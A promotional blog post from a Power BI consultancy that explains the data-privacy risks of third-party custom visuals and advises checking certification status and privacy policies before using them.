Are Power BI’s Custom Visuals Safe?

Addend Analytics is a Microsoft Power BI-partner based in Mumbai, India. Apart from being authorized for Power BI implementations, Addend has successfully executed Power BI projects for 100+ clients across sectors like Financial Services, Banking, Insurance, Retail, Sales, Manufacturing, Real estate, Logistics, and Healthcare in countries like the US, Europe, Switzerland, and Australia. Get a free consultation now by emailing us at kamal.sharma@addendanalytics.com.

Hey there,
I hope the new normal is treating you well there.

Yeah so, whenever a BI expert thinks of an out-of-the-box impact through visualizations, Custom Visuals is one of the big ideas that comes into the mind.

Are Custom Visuals really safe???

Data is everything in today’s tech-savvy industry. One untrusted source is enough to expose out all the information either of the customers or the company’s internal data.


Before proceeding with its security support, let’s understand what the hack is a custom visual!

“Custom visuals are created by developers using the custom visuals SDK. Developers use JavaScript libraries such as jQuery, D3, R-language scripts, HTML5, and CSS3, etc. to create custom visuals from scratch. Once a custom visual is ready, it is then tested and publish them to the marketplace.”

It allows a developer to create rich user experiences inside the Power BI reports that can extend the visualization abilities, interpretation of the data, and analytical capabilities of data analysis and business intelligence.

There are 3 ways to deploy custom visuals for use by report builders:

  1. Sharing a .pbiviz file
  2. Adding to the organizational visuals tenant repository
  3. Having users download visuals from the marketplace (AppSource)

When you receive and use a .pbiviz file, you are taking responsibility for assessing data security. When your Power BI admin deploys a custom visual to the organizational visuals repository, they are approving the visual for use inside your organization.

If you are using visuals from the marketplace, you will need to check the information provided about data privacy, and it’s not all that straightforward at the moment.

Certified Visuals

One thing that makes understanding data privacy in custom visuals easier is the designation of a certified custom visual. One of the requirements for certification is ” Does not access external services or resources, including but not limited to, no HTTP/S or WebSocket requests go out of Power BI Consultant to any services.”

Power BI

Are the Uncertified Custom Visuals not safe???

Uncertified visuals are not necessarily less secure than custom visuals, but they have not been tested by Microsoft to confirm security. Any random person can create a custom visual, which is pretty cool and also potentially dangerous for data security.

A Disclaimer Placed on Uncertified Custom Visuals. But unfortunately, it is at the bottom of the visual description.

This is helpful, but there are a couple of objections with it:

  1. This information is at the bottom of the visual description. Once you select a visual from the list, you most likely need to scroll down to see this note.
  2. This is generic, boilerplate language added by AppSource. They are basically saying that it is possible that the visual might send data over the internet. They are not telling you that it definitely does!

How to check if the visual is safe???

If you want to know the data privacy policy of a particular custom visual, you have to find the link in the description in AppSource and go read it.

Radar Chart

Custom Radar Chart

Apparently, every custom visual in the marketplace must have an accompanying privacy policy. You can find the link to the privacy policy by looking at AppSource in a browser (rather than within the window in Power BI desktop). The privacy policy is in the left column near the bottom.

Radar Chart

But there doesn’t seem to be a standard template for the privacy policy, so you may not find what you are looking for there. For example, the Violin Plot has a very simple and helpful privacy policy.

Power BI

Violin Plot Privacy Policy

What Have We Learned?

Determining what data is sent externally by a custom visual is not simple. Having a look into the privacy policy and the disclaimer by Microsoft would also be great to have. While many visuals are sandboxed and do not communicate externally.

I hope this blog on custom visuals must have given you an idea about data privacy. In the end, I would suggest to only use the prebuilt visuals in Power BI Dashboard unless you really need a custom visual. If needed, use a trusted certified visual only.

Thank you for your time here.

Happy learning…
😊

Varun Tiwari
Data Analyst
Addend Analytics